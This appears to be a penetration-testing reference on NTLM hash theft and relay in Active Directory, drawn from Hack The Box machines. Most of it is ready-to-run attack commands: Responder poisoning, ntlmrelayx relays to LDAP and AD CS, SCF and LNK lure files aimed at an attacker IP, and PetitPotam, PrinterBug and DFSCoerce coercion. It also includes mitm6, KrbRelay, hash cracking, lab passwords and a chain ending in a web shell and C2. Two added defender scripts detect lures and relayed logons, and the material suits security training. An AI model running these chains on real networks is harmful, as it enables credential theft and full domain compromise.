
NTLM Theft and Relay

# Overview

NTLM theft captures Windows authentication hashes by forcing a victim machine to authenticate to an attacker-controlled server. Relay attacks forward captured NTLM authentication to other services, impersonating the victim. Combined with coercion techniques (PetitPotam, PrinterBug, DFSCoerce) that force privileged accounts to authenticate, an attacker can escalate from an unprivileged position to full domain compromise in a single relay chain. Understanding when relaying works (and when it does not, due to SMB signing or EPA) is critical.

# Prerequisites

  • Network position where LLMNR/NBT-NS/mDNS multicast traffic is reachable (same subnet for poisoning)
  • A writable SMB share or web server reachable by the victim for SCF/LNK attacks
  • ntlmrelayx for relay attacks; Responder for hash capture
  • Target services that do not require SMB signing (check with netexec)

# Detection & Enumeration

## SMB Signing Check

```bash
# Check if SMB signing is required (blocks NTLM relay to SMB)
netexec smb 10.10.11.231
# Look for: signing:True (required) vs signing:False (vulnerable to relay)
# Forest: signing:True -> relay to SMB won't work, must relay to LDAP/HTTP
# Flight: signing:True -> same constraint
# Rebound: signing:True -> same constraint
```

## Identify Writable SMB Shares

```bash
# Check share permissions for write access
smbmap -H 10.10.10.100 -u user -p pass
# Look for WRITE or READ,WRITE permissions
crackmapexec smb 10.10.10.100 -u user -p pass --shares
```

# Exploitation / Execution

## Responder: NTLM Hash Capture

```bash
# Basic Responder with verbose output on tun0 interface
# -I: interface to listen on
# -v: verbose mode
responder -I tun0 -v

# Responder with additional poisoning options
# When running alongside ntlmrelayx, turn the SMB and HTTP servers off in
# Responder.conf (SMB = Off, HTTP = Off) so the two tools do not fight over ports
responder -I tun0 -wdPv
# -w: start WPAD rogue server (forces browsers to proxy through attacker)
# -d: enable answers for DHCP broadcast requests
# -P: enable proxy auth NTLMSSP

# Capture hash via UNC path trigger
# From MSSQL: EXEC MASTER.sys.xp_dirtree '\\10.10.14.14\test', 1, 1
# From LFI: http://school.flight.htb/index.php?view=//10.10.14.59/htb
```

## ntlmrelayx: NTLM Relay

```bash
# Relay captured NTLM auth to LDAP (commonly not signed)
# --no-smb-server: disable SMB server to avoid conflicts with Responder
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server --escalate-user <username>

# Relay to LDAPS (if channel binding not enforced)
ntlmrelayx.py -t ldaps://<DC_IP> --no-smb-server

# Relay with SOCKS proxy for session hijack
# -socks: start SOCKS proxy for each relayed session
ntlmrelayx.py -t ldap://10.10.10.161 --no-smb-server -socks

# Relay to HTTP (e.g., AD CS web enrollment for ESC8)
ntlmrelayx.py -t http://<CA_SERVER>/certsrv/certfnsh.asp --no-smb-server

# LDAP relay for RBCD (grant delegation rights)
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01.domain.local --delegate-access

# LDAP relay with auto machine account creation (for RBCD attack path)
impacket-ntlmrelayx -tf targets.txt -smb2support -t ldap://dc01.domain.local --delegate-access --add-computer

# ADCS certificate enrollment relay
impacket-ntlmrelayx -tf targets.txt -smb2support -t adcs://10.10.10.10

# SOCKS mode with proxychains usage
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# Then use via proxychains: proxychains4 impacket-smbclient ...

# IPv6 relay (requires mitm6 for DHCPv6 spoofing)
impacket-ntlmrelayx -tf targets.txt -smb2support -6
# The -6 flag enables IPv6 listener for relayed connections from mitm6
```

## SCF File Attack (Icon Path)

```bash
# Create SCF file with icon path pointing to attacker IP
cat > shortcut.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.14.10\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF

# Place SCF file on a writable SMB share
smbclient //flight.htb/Shared -U 'S.Moon%S@Ss!K@*t13'
smb: \> put shortcut.scf

# Start Responder to capture NTLMv2 hash when a user browses the share
responder -I tun0 -v
```

## Malicious .lnk Files

```bash
# Generate .lnk files with ntlm_theft
git clone https://github.com/Greenwolf/ntlm_theft
cd ntlm_theft
python3 ntlm_theft.py --generate all --server 10.10.14.67 --filename htb

# Upload files to writable share
# Focus on (BROWSE TO FOLDER) trigger type files for minimal user interaction
impacket-smbclient s.moon:'S@Ss!K@*t13'@flight.htb
use Shared
put "desktop.ini"
put "target.lnk"

# Start Responder to capture when victim browses folder
responder -I tun0 -v
```
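
Defender-side counterpart to the SCF and .lnk lures above, added here as an example that is not part of the original notes or of ntlm_theft: it scans a share for lure-type files whose UNC icon path points at a host outside an assumed file-server allowlist (ALLOWED_HOSTS and the sample files are constructed).

```python
"""Hunt a file share for NTLM-theft lure files (SCF, desktop.ini, LNK, URL).
Added defender-side example, not part of the original notes or of ntlm_theft.
A lure makes Explorer fetch an icon over SMB from the host in its UNC path,
so any UNC host outside the file-server allowlist is reported.
ALLOWED_HOSTS and the sample files are constructed for the demo.
"""
import re
import tempfile
from pathlib import Path

ALLOWED_HOSTS = {"fileserver01", "fileserver01.domain.local"}  # assumed inventory
LURE_EXTENSIONS = {".scf", ".lnk", ".url", ".ini"}
UNC_RE = re.compile(r"\\\\([^\\\s]+)\\")  # \\host\...

def suspicious_unc_hosts(data: bytes) -> set:
    """Hosts from UNC paths in ANSI/UTF-8 text or UTF-16LE strings (LNK), minus the allowlist."""
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(h.lower() for h in UNC_RE.findall(text))
    return {h for h in hosts if h not in ALLOWED_HOSTS}

def scan_share(root) -> list:
    """Return [(relative_path, [hosts])] for lure-type files pointing at non-allowlisted hosts."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in LURE_EXTENSIONS:
            bad = suspicious_unc_hosts(path.read_bytes())
            if bad:
                findings.append((str(path.relative_to(root)), sorted(bad)))
    return findings

def build_demo_share() -> str:
    """Constructed share: one SCF lure, one LNK lure, one benign desktop.ini, one text file."""
    d = Path(tempfile.mkdtemp())
    (d / "shortcut.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.10\\share\\icon.ico\n[Taskbar]\nCommand=ToggleDesktop\n")
    (d / "desktop.ini").write_text("[.ShellClassInfo]\nIconResource=\\\\fileserver01\\icons\\team.ico,0\n")
    # Minimal stand-in for a .lnk: a 4-byte header keeps the UTF-16LE icon path aligned
    (d / "target.lnk").write_bytes(b"L\x00\x00\x00" + "\\\\10.10.14.10\\share\\icon.ico".encode("utf-16-le"))
    (d / "readme.txt").write_text("see \\\\10.10.14.10\\share for details\n")  # not a lure type, ignored
    return str(d)

if __name__ == "__main__":
    for rel, hosts in scan_share(build_demo_share()):
        print(f"LURE {rel}: UNC icon path to {', '.join(hosts)}")
```

Run it against a mounted copy of any share users browse; a hit on a file you did not place there is the artefact that precedes the Responder capture.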

## PetitPotam Coercion

```bash
# Force a server to authenticate to attacker via MS-EFSRPC
# Target: any Windows server; Attacker: Responder or ntlmrelayx
python3 PetitPotam.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>

# With ntlmrelayx to capture and relay
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server &
python3 PetitPotam.py 10.10.14.10 10.10.10.10  # target DC
```

## PrinterBug Coercion

```bash
# Force a print server to authenticate via MS-RPRN
# Target: typically a Domain Controller
python3 printerbug.py <domain>/<user>:<pass>@<target_ip> <attacker_ip>

# Combined with ntlmrelayx
ntlmrelayx.py -t ldap://<DC_IP> --no-smb-server &
python3 printerbug.py domain/user:pass@10.10.10.10 10.10.14.10
```

## DFSCoerce

```bash
# DFS coercion: abuse MS-DFSNM to force authentication
python3 dfscoerce.py -d <domain> -u <user> -p <pass> <attacker_ip> <target_ip>
```

## ShadowCoerce

```bash
# ShadowCoerce: NTLM coercion via MS-FSRVP (File Server VSS Agent Service) over \PIPE\FssagentRpc
# Different protocol from PetitPotam's MS-EFSRPC; only works where the File Server VSS Agent role is installed
python3 ShadowCoerce.py -d domain.local -u user -p pass -t 10.10.10.10 10.10.14.5
# Abuses the IsPathSupported / IsPathShadowCopied methods rather than EfsRpcOpenFileRaw
```

## SpoolSample.exe

```cmd
:: SpoolSample.exe: original C# PrinterBug implementation
SpoolSample.exe <target> <attacker_ip>
```

## Cross-Session Relay (on Same Machine)

When you have a foothold on a machine with another logged-in user, you can relay within the same host:

```bash
# KrbRelay: cross-session relay on Windows Server 2019
# -ntlm: use NTLM authentication (not Kerberos)
# -session: target user's session ID
# -clsid: CLSID for RPC service with correct permissions
./RunasCs.exe oorend '1GR8t@$$4u' -l 9 "c:\users\winrm_svc\documents\KrbRelay.exe -ntlm -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -port 10246"

# RunasCs enables running as a different user to interact with other sessions
# Run qwinsta first to see which sessions have active users
```

## IPv6 Attacks (mitm6 + ntlmrelayx)

```bash
# mitm6: IPv6 DNS takeover to redirect authentication
# Start ntlmrelayx targeting LDAP
ntlmrelayx.py -6 -t ldap://<DC_IP> --no-smb-server -wh attacker-wpad.example.com &
mitm6 -d <domain>

# This forces clients on the subnet to authenticate via IPv6 to the attacker
# WPAD is spoofed, causing browsers and services to proxy through the attacker
```

## Cracking Captured Hashes

```bash
# NTLMv2 captured by Responder -> john/hashcat
john hash --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
# Mode 5600: NetNTLMv2

# Sessions held open by ntlmrelayx -socks -> no cracking needed (session hijack)
# Use proxychains with the SOCKS port to interact with relayed sessions
```

## Real-World Chain (Flight HTB)

```bash
# 1. LFI on web app -> UNC path inclusion
responder -I tun0 -v
# Request the LFI with a UNC path (browser or curl):
curl 'http://school.flight.htb/index.php?view=//10.10.14.59/htb'
# Captured svc_apache hash -> cracked to S@Ss!K@*t13

# 2. Password spray svc_apache password -> found S.Moon with same password
netexec smb flight.htb -u users.txt -p 'S@Ss!K@*t13'
# [+] S.Moon:S@Ss!K@*t13  with WRITE access to Shared

# 3. Upload ntlm_theft files to writable share -> capture c.bum hash
python3 ntlm_theft.py --generate all --server 10.10.14.67 --filename htb
# Crack c.bum hash -> Tikkycoll_431012284
# WRITE access to Web share -> PHP shell -> sliver C2
```

# When Relaying Works and When It Does Not

| Target Service | Relay Requirement | Typical Status |
|---|---|---|
| SMB | SMB signing disabled | Often enabled on DCs (signing:True) |
| LDAP | Channel binding not enforced | Often relayable; used for RBCD/DCSync escalation |
| LDAPS | Channel binding not enforced | Sometimes relayable |
| HTTP (AD CS) | No EPA | ESC8 attack path |
| MSSQL | Windows auth mode | If configured for Windows auth |
| IMAP/POP3 | NTLM auth enabled | Rare in AD environments |

SMB signing status is key:

  • signing:True (enforced): Relay to SMB is blocked. Relay to LDAP is still possible.
  • signing:False: Relay to any service is possible, including SMB.

```bash
# Quick check
netexec smb 10.10.10.10
# Look for "(signing:True)" or "(signing:False)" in output
```

# Common Pitfalls

  • Relay fails with signing:True: The target enforces SMB signing. Switch to LDAP relay (commonly not signed).
  • Responder captures no hashes: You may not be on the same broadcast domain. Use SCF/LNK files on writable shares instead of poisoning.
  • ntlmrelayx session dies: The relayed session has a short lifetime. Use SOCKS mode and proxychains, or act quickly.
  • Channel binding blocks LDAP relay: The DC enforces LDAP channel binding. Relaying is not possible on this target.
  • Impacket DNS resolution: When -dc-ip is not specified, impacket attempts DNS resolution which fails in split-brain DNS. Always use -dc-ip when possible.
  • SOCKS session timeout: ntlmrelayx -socks sessions expire when the relayed connection times out (typically minutes). Act quickly after obtaining sessions.

# OPSEC Considerations

  • Responder's LLMNR and NBT-NS poisoning is active on the network and detectable by NIDS/NIPS
  • SMB requests from unexpected hosts to writable shares may trigger alerts
  • PetitPotam/PrinterBug generate MS-EFSRPC/MS-RPRN events which are monitored by EDR
  • Cracking NTLMv2 hashes is offline and undetectable, but the initial capture is very visible
  • mitm6 is extremely noisy on the network and may disrupt IPv6 services
  • NTLM relay auth → Event ID 4624 Logon Type 3 (network logon) — distinct from interactive
  • Responder WPAD spoofing → Detected by Microsoft Defender for Identity (MDI) with high confidence
  • ntlmrelayx traffic patterns → Detectable by Zeek/Suricata with custom signatures
  • SMB signing enforcement → Check with: nxc smb <target> --signing
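
The 4624 Logon Type 3 indicator above, worked into detection logic as an added example that is not part of the original notes: it flags NTLM network logons whose source IP does not belong to the workstation the client claimed, which is how a relayed authentication looks from the target's side (the INVENTORY map and SAMPLE_EVENTS are constructed).

```python
"""Flag 4624 events that look like relayed NTLM network logons.
Added defender-side example, not part of the original notes. Heuristic: a relayed
logon arrives at the target as LogonType 3 over the NTLM package, and the
WorkstationName carried in the client's NTLM message does not belong to the
source IpAddress the target saw (the relay host). INVENTORY and SAMPLE_EVENTS
are constructed for the demo.
"""
from collections import namedtuple

# Assumed asset inventory: workstation name -> its known IP address
INVENTORY = {"WS01": "10.10.10.50", "WS02": "10.10.10.51", "DC01": "10.10.10.10"}
Finding = namedtuple("Finding", "reason user workstation ip")

# Constructed Security-log 4624 events, reduced to the EventData fields used here
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "j.doe", "WorkstationName": "WS01", "IpAddress": "10.10.10.50"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "DC01$", "WorkstationName": "DC01", "IpAddress": "10.10.14.10"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "j.doe", "WorkstationName": "WS02", "IpAddress": "10.10.10.51"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "c.bum", "WorkstationName": "-", "IpAddress": "10.10.14.10"},
]

def detect_relayed_ntlm(events, inventory=INVENTORY):
    """Return Findings for NTLM network logons whose source IP does not fit the claimed workstation."""
    known_ips = set(inventory.values())
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue  # only network logons (Type 3) are relay candidates
        if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
            continue  # Kerberos logons are not NTLM relay
        ws, ip = ev.get("WorkstationName", "-").upper(), ev.get("IpAddress", "-")
        expected = inventory.get(ws)
        if expected == ip or (expected is None and ip in known_ips):
            continue  # source matches the claimed workstation, or is at least a known host
        reason = (f"workstation {ws} is {expected} but source was {ip}" if expected
                  else f"NTLM logon from unknown source {ip}")
        findings.append(Finding(reason, ev.get("TargetUserName"), ws, ip))
    return findings

if __name__ == "__main__":
    for f in detect_relayed_ntlm(SAMPLE_EVENTS):
        print(f"POSSIBLE RELAY user={f.user} workstation={f.workstation} src={f.ip}: {f.reason}")
```

A machine account (DC01$) logging on over NTLM from an address that is not the DC is the signature of a coerced-and-relayed authentication; the inventory lookup is the part you would replace with your CMDB or DHCP leases.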

# Post-Exploitation Value

  • Captured NTLM hashes provide credential material for cracking
  • Relayed NTLM to LDAP can create/escalate accounts, grant DCSync rights, or perform RBCD
  • Relayed NTLM to AD CS HTTP endpoint (ESC8) yields certificates for Domain Admin
  • Even low-privilege captured hashes can be used for further enumeration and password spraying

# Cross-References

## Tool References

| Tool | Link |
|---|---|
| Responder | https://github.com/lgandx/Responder |
| ntlmrelayx (Impacket) | https://github.com/fortra/impacket |
| ntlm_theft | https://github.com/Greenwolf/ntlm_theft |
| PetitPotam | https://github.com/topotam/PetitPotam |
| PrinterBug | https://github.com/dirkjanm/krbrelayx |
| DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |
| KrbRelay | https://github.com/cube0x0/KrbRelay |
| mitm6 | https://github.com/dirkjanm/mitm6 |

## Source Machines

  • Flight (Hard) — LFI via UNC -> svc_apache hash -> spray -> S.Moon -> ntlm_theft on Shared -> c.bum hash -> Web upload shell -> DCSync
  • Fluffy (Easy) — CVE-2025-24071 ZIP extraction -> NTLM capture of p.agila -> cracked to prometheusx-303
  • Escape (Medium) — MSSQL xp_dirtree to attacker UNC -> Responder captures sql_svc hash -> cracked to REGGIE1234ronnie
  • Rebound (Insane) — Cross-session relay via KrbRelay from winrm_svc session to tbrady's session -> NTLMv2 hash cracked -> gMSA password -> RBCD -> DCSync